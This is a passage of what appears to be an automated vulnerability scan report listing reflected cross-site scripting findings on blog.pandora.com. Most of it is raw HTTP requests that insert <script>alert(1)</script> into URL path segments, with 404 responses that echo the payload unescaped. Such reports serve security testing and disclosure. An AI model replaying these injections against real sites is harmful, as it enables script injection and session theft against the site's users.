Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8496d<script>alert(1)</script>895ffd7f0fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 297e2<script>alert(1)</script>6746ce0f566 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5a107<script>alert(1)</script>7d716b47026 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeade<script>alert(1)</script>36a25f2db79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f952<script>alert(1)</script>8da5452ad57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f17b<script>alert(1)</script>64bc9a276f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 976b9<script>alert(1)</script>41935888f21 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27156<script>alert(1)</script>bb3cfa82e19 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27324<script>alert(1)</script>f28ce60039 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31461<script>alert(1)</script>df1666c9e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1142<script>alert(1)</script>f83864e82ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f51a<script>alert(1)</script>191470466ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72e6e<script>alert(1)</script>09b739b49da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a3828<script>alert(1)</script>87512ebd2ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39bf5<script>alert(1)</script>8b77ea0b66d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a869d<script>alert(1)</script>14889bb3dee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f3d62<script>alert(1)</script>1d21570497f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23985<script>alert(1)</script>089a1722201 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c61d<script>alert(1)</script>b40d4c584c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
